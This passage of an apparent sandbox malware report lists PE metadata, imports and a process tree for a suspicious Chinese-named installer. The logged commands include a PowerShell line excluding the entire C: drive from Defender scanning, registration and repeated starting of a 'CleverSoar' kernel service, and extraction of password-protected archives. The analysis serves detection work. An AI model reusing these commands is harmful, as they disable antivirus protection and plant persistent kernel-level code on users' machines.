                                                        .rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0xcb000 | 0x11000 | 0x11000 | 5c24f1fdca2aa99f72cdacc12e9a194f | False | 0.18787339154411764 | data | 3.721333192760738 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
                                                        RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
                                                        RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
                                                        RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
                                                        RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
                                                        RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
                                                        RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
                                                        RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
                                                        RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
                                                        RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
                                                        RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
                                                        RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
                                                        RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
                                                        RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
                                                        RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
                                                        RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
                                                        RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
                                                        RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
                                                        RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
                                                        RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
                                                        RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
                                                        RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
                                                        RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
                                                        RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
                                                        RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
                                                        RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
                                                        RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1590909090909092
                                                        RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
                                                        RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2804532577903683
                                                        RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
                                                        DLL | Import
                                                        kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                        comctl32.dll | InitCommonControls
                                                        user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                        oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                        advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
                                                        Name | Ordinal | Address
                                                        __dbk_fcall_wrapper | 2 | 0x40fc10
                                                        dbkFCallWrapperAddr | 1 | 0x4b063c
                                                        Language of compilation system | Country where language is spoken | Map
                                                        English | United States |
                                                        No network behavior found

                                                        Target ID:0
                                                        Start time:01:50:41
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                                        Imagebase:0x890000
                                                        File size:5'707'417 bytes
                                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:true

                                                        Target ID:1
                                                        Start time:01:50:42
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-A58KC.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$20492,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe"
                                                        Imagebase:0xe00000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:2
                                                        Start time:01:50:42
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                                        Imagebase:0x7ff788560000
                                                        File size:452'608 bytes
                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:3
                                                        Start time:01:50:42
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:4
                                                        Start time:01:50:46
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                        Imagebase:0x7ff693ab0000
                                                        File size:496'640 bytes
                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                        Has elevated privileges:true
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:5
                                                        Start time:01:50:51
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                                        Imagebase:0x890000
                                                        File size:5'707'417 bytes
                                                        MD5 hash:A32B45411FDACB8DC364E2ECC75F7C54
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:low
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:01:50:51
                                                        Start date:23/12/2024
                                                        Path:C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-6LK49.tmp\#U5b89#U88c5#U52a9#U624b_2.0.4.tmp" /SL5="$402A0,4753025,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.4.exe" /VERYSILENT
                                                        Imagebase:0xb40000
                                                        File size:3'366'912 bytes
                                                        MD5 hash:9902FA6D39184B87AED7D94A037912D8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:Borland Delphi
                                                        Reputation:moderate
                                                        Has exited:true

                                                        Target ID:7
                                                        Start time:01:50:53
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:8
                                                        Start time:01:50:53
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:9
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:true

                                                        Target ID:10
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                                                        Imagebase:0xad0000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 0%, ReversingLabs
                                                        • Detection: 0%, Virustotal, Browse
                                                        Has exited:true

                                                        Target ID:11
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:12
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Program Files (x86)\Windows NT\7zr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                                                        Imagebase:0xad0000
                                                        File size:831'200 bytes
                                                        MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:13
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:14
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:15
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:16
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:17
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:18
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:19
                                                        Start time:01:50:54
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:21
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:22
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:23
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:24
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:25
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:26
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:27
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:28
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:29
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:30
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:31
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:32
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:33
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:34
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:35
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:36
                                                        Start time:01:50:55
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:37
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:38
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:39
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:40
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:41
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:42
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\cmd.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:cmd /c start sc start CleverSoar
                                                        Imagebase:0x7ff7f4ec0000
                                                        File size:289'792 bytes
                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:43
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\sc.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:sc start CleverSoar
                                                        Imagebase:0x7ff6378a0000
                                                        File size:72'192 bytes
                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:44
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
                                                        Path:C:\Windows\System32\conhost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        Imagebase:0x7ff7699e0000
                                                        File size:862'208 bytes
                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Target ID:45
                                                        Start time:01:50:56
                                                        Start date:23/12/2024
